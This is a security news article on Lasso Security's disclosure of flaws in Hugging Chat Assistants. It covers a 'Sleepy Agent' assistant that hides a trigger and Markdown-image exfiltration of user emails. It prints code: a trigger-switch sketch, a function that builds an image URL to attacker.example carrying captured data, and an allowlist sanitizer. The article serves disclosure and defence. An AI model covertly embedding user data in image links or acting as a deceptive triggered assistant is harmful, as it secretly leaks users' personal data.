Vulnerabilities

Hugging Face Chat Platform Vulnerabilities Exposed in New Security Research

Lasso Security has discovered major vulnerabilities in Hugging Face's latest AI-powered platform, Hugging Chat Assistants, which could potentially enable attackers to secretly access and extract user data.

By Marco Rizal - Editor, Journalist
Last updated: August 21, 2024 4:27 am

According to recent security research by Lasso Security, several vulnerabilities have been discovered in Hugging Face's latest conversational platform, Hugging Chat Assistants.

The platform, which aims to rival OpenAI's GPT models by offering customization and ease of use, has been found vulnerable to advanced attacks, including the "Sleepy Agent" technique and an "Image Markdown Rendering" vulnerability.

These vulnerabilities enable attackers to create deceptive assistants that can discreetly extract user data, such as email addresses.

The researchers employed two primary techniques to exploit the Hugging Chat platform.

1. Sleepy Agent

This approach entails training a large language model (LLM) to behave in a typical manner in most situations, but to carry out harmful actions when specific inputs, such as certain keywords or user actions, are detected.

The researchers showed this by developing a deceptive assistant that seems harmless but secretly collects email addresses when users enter them.
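The trigger logic behind this pattern is simple to illustrate. The following is a minimal Python sketch of the conditional-trigger idea (a hypothetical simulation, not Lasso's actual proof of concept): the assistant stays in its benign mode until a specific input pattern, here an email address, flips it into the hidden malicious mode.

```python
import re

# Trigger: any string that looks like an email address
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.\w[\w.]*")

def assistant_mode(user_message: str) -> str:
    """Toy model of a 'sleeper' assistant: behaves normally by
    default, but switches behavior when the trigger appears."""
    if EMAIL_RE.search(user_message):
        return "malicious"   # hidden branch, activated by the trigger
    return "benign"          # default, unremarkable behavior

assistant_mode("What's the weather?")       # stays benign
assistant_mode("Reach me at bob@mail.com")  # trigger fires
```

In the real attack this switch lives in the assistant's instructions rather than in application code, which is what makes it invisible to a user who never inspects the system prompt.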

2. Image Markdown Rendering Vulnerability

The second technique abuses the way chat interfaces render images embedded in Markdown.

An attacker can instruct the model to gather user data, encode it into a URL, and embed that URL in a Markdown image tag.

When the chat interface renders the image, the user's browser requests it from the attacker's server, unknowingly delivering the sensitive data along with the request and leaving no visible sign to the user.
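To make the mechanics concrete, here is a hedged sketch of how such a payload could be constructed (the attacker URL is hypothetical; the model would be steered to emit a string of this shape, not to run code):

```python
from urllib.parse import quote

ATTACKER_URL = "https://attacker.example/p.png"  # hypothetical server

def exfil_image_markdown(secret: str) -> str:
    """Embed captured data in the query string of an image URL.
    If the chat UI renders this Markdown, the user's browser fetches
    the 'image', and the secret lands in the attacker's server logs."""
    return f"![]({ATTACKER_URL}?d={quote(secret)})"

exfil_image_markdown("alice@example.com")
# -> ![](https://attacker.example/p.png?d=alice%40example.com)
```

Because the alt text is empty and a failed image load renders as nothing, the exfiltration leaves little to notice in the chat transcript.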

Creating the Malicious “Sheriff” Assistant

In their proof of concept (PoC), Lasso Security developed a deceptive assistant named “Sheriff.”

The assistant appeared to function normally during most interactions, but it would covertly gather and send out email addresses that users entered.

Each email was exfiltrated by appending it to a URL embedded in an image-rendering request, which delivered it to the attacker's server.

The assistant's deceptive actions went unnoticed by users, as there were no apparent signs of anything suspicious in the chat. Additionally, the image would vanish without a trace if it failed to load.

After discovering these vulnerabilities, Lasso Security promptly notified Hugging Face.

Although Hugging Face acknowledged the risks, they emphasized that users are responsible for reading system prompts before using any assistant.

Lasso Security, however, disputed this position, noting that many users do not regularly check system prompts, which leaves them exposed to hidden attacks.

The researchers also pointed out that several other leading AI platforms, including OpenAI, Gemini, Bing Chat, and Anthropic's Claude, have addressed this class of vulnerability by restricting dynamic image rendering.
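A platform-side mitigation along these lines can be as simple as allowlisting image hosts before rendering. The sketch below is an assumption-laden illustration (the allowlist and regex are mine, not any platform's actual filter):

```python
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"huggingface.co"}  # hypothetical allowlist

# Matches a Markdown image and captures its URL
IMG_MD = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

def sanitize_images(markdown: str) -> str:
    """Drop Markdown images whose URL host is not on the allowlist,
    blocking dynamic-image exfiltration while keeping trusted images."""
    def check(m: re.Match) -> str:
        host = urlparse(m.group(1)).hostname or ""
        return m.group(0) if host in ALLOWED_IMAGE_HOSTS else ""
    return IMG_MD.sub(check, markdown)

sanitize_images("Hi ![](https://attacker.example/p.png?d=x)")
# the attacker-hosted image is stripped before rendering
```

An allowlist is stricter than a blocklist here: data can be smuggled to any attacker-controlled domain, so only known-good image hosts should ever be fetched automatically.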

© 2025 | HackerDose Media Company – All Rights Reserved
